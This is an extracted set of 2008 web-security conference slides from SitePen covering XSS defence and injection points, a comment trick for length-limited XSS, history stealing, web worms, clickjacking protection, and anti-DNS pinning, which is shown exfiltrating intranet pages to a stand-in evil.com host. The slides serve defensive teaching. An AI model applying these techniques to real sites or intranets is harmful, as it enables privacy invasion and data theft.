4. Swap back whitelist of allowed tags. e.g.:
• <strong> <strong>
5. Take extra care over attributes:
• <a href="([^&]*)"/>
<a href=quot;$1quot;/>
6. Take great care over regular expressions
Copyright SitePen, Inc. 2008. All Rights Reserved
46. XSS - Protection (malformed HTML is legal)
1. Find another way to do it / Swap jobs / Find
some other solution to the problem
2. Create a tag soup parser to create a DOM tree
from a badly formed HTML document
• Remember to recursively check encodings
3. Create a tree walker that removes all non
approved elements and attributes
Copyright SitePen, Inc. 2008. All Rights Reserved
47. There is NO WAY to protect
against some injection points
Copyright SitePen, Inc. 2008. All Rights Reserved
48. XSS - Injection Points
Places you can protect:
• Plain content
<div>$</div>
• Some attribute values
<input name=x value=quot;$quot;> (but take care)
• Javascript string values:
<script>str = quot;$quot;;</script> (but take care)
Anything else is likely to be unsafe
Copyright SitePen, Inc. 2008. All Rights Reserved
49. XSS - Injection Points
Places you can’t easily protect:
• <script>$</script>
• <div $>
• <div style=quot;$quot;>...
• <div background=quot;$quot;>
• <img src=quot;$quot;>
• etc
If users can affect CSS values, hrefs, srcs or plain
JavaScript then you are likely to have an XSS hole
Copyright SitePen, Inc. 2008. All Rights Reserved
50. XSS Tricks:
Comment Power-up
Copyright SitePen, Inc. 2008. All Rights Reserved
51. XSS - Comment Power-up
Commonly reflected attacks have length restrictions
How to create space for an injection attack
• Use ‘<script>/*’ in an restricted unprotected field
and ‘*/’ in a later unrestricted protected field
Copyright SitePen, Inc. 2008. All Rights Reserved
52. XSS - Summary
For data input:
• Restrict allowed characters for destination type
For data output:
• Escaped for the destination environment
• Ensure encoding is specified (e.g. UTF-8)
Allow inject only into known safe points
Never assume that a hole is too small to jump through
Copyright SitePen, Inc. 2008. All Rights Reserved
54. History Stealing - Part 1
Mr. Evil wants to know if you visit bank.com
He creates a page with a link and
uses a script to read the CSS link
color:
• purple: customer
• blue: not a customer
Copyright SitePen, Inc. 2008. All Rights Reserved
55. History Stealing - Part 2
2 methods of detecting link color:
• Easy - use JavaScript to read CSS properties
• When JS is turned off - use CSS to ping the server
Copyright SitePen, Inc. 2008. All Rights Reserved
56. History Stealing - Part 2
Point a script tag at a protected HTML resource, detect
differing replies by differing error messages
<script src=quot;http://mail.google.com/mailquot;>
http://ha.ckers.org/weird/javascript-website-login-checker.html
Copyright SitePen, Inc. 2008. All Rights Reserved
57. History Stealing - Part 3
A page can quickly check thousands of sites and find
where you bank and store your email
A page can follow your clicks around the net:
• Check for common set of URLs
• Page reports hits to server
• Server reads hit pages, greps out links sends links
back
• Page checks and follows a click-stream
Copyright SitePen, Inc. 2008. All Rights Reserved
59. Web Worms
If your site that isn’t 100% safe against XSS and CSRF, users
can attack their ‘friends’ with scripts
XHR/Flash/Quicktime can be used as a vector
Web worms grow much faster than email worms
So far, infections have been mostly benign, like how email
worms were in the early 90’s ...
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
Copyright SitePen, Inc. 2008. All Rights Reserved
60. Intranet Hacking
History stealing to enumerate hosts inside the firewall
Anti-DNS pinning to read HTML from inside
Many routers / firewalls / etc have default passwords,
which an attacker can exploit
Use CSRF to alter router / firewall settings
http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf
Copyright SitePen, Inc. 2008. All Rights Reserved
62. Clickjacking - Protection
if (window.top != window) {
document.body.style.display = quot;nonequot;;
}
Copyright SitePen, Inc. 2008. All Rights Reserved
63. ADP = Anti DNS Pinning
Moving intranet servers into your
domain
64. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
65. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Let’s visit
evil.com 10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
66. Anti-DNS Pinning
DNS for evil.com
What’s the IP address
for evil.com? 1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
67. Anti-DNS Pinning
DNS for evil.com
You need 1.2.3.4
(timeout = 1 sec)
1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
68. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Can I have
http://evil.com?
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
69. Anti-DNS Pinning
HTML +
DNS for evil.com
JavaScript that
creates an iframe
2 seconds after
1.2.3.4
the page has
loaded
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
70. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Time passes
(2 seconds) 10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
71. Anti-DNS Pinning
DNS for evil.com
What’s the IP address
for evil.com? 1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
72. Anti-DNS Pinning
DNS for evil.com
You need 10.0.0.1
1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
73. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
Can I have 10.0.0.1
http://evil.com/blah?
Copyright SitePen, Inc. 2008. All Rights Reserved
74. Anti-DNS Pinning
DNS for evil.com
1.2.3.4
This web server is really
http://intranet.corp.com
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
75. Anti-DNS Pinning
Outer frame reads DNS for evil.com
text from inner
iframe and sends
it back to 1.2.3.4 1.2.3.4
10.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
76. Anti-DNS Pinning
About ‘Pinning’:
Browsers ‘pin’ addresses to stop short timeouts
DNS round-robin forces re-query of DNS if
website appears to be down
So websites can get around pins by firewalling
themselves thus appearing to be down
Copyright SitePen, Inc. 2008. All Rights Reserved
77. Anti-DNS Pinning
It’s not great for the Internet:
The browser thinks the domain is evil.com, so cookies
for innocent.com are not sent:
Cookie protected resources are safe (for now)
But it’s great for Intranet hacking
No cookies needed to read from
192.168.0.1 or 127.0.0.1
Copyright SitePen, Inc. 2008. All Rights Reserved
78. Questions?
Joe Walker
http://sitepen.com
http://directwebremoting.org/blog/joe
Copyright SitePen, Inc. 2008. All Rights Reserved
80. Web 2.0 Hacking
Building blocks:
• Google Alerts: Search to EMail
• Mailinator: EMail to RSS
• Ponyfish: Web to RSS via scraping
• Storage: DabbleDB, Zoho
• Yahoo Pipes: RSS remixing
• L8R: Cron for EMail
• Google Mashup Editor: RSS to REST API
• Dapper, OpenKappow
Copyright SitePen, Inc. 2008. All Rights Reserved
82. Dropping SSL after login is dangerous
Being able to snoop on someone else’s cookie is
virtually the same as being able to snoop on their
password
Some services (e.g. Google) default to http after login
(bad), but allow you to use https for the whole session:
• https://mail.google.com/mail/
• https://www.google.com/calendar/
• etc.
Copyright SitePen, Inc. 2008. All Rights Reserved
83. Useful Tools
Firefox:
• NoScript - Accept scripts only from sites you trust
• AltCookies - Accept cookies only from sites you trust
• EditCooikes - Alter cookies for testing
• Firebug - Dig deeply into HTTP/JavaSript/CSS and HTTP
General:
• Paros - Filtering Proxy (can be configured to be
transparent)
• Burp - Like Paros
• Fiddler - Like Paros with integration into IE
Copyright SitePen, Inc. 2008. All Rights Reserved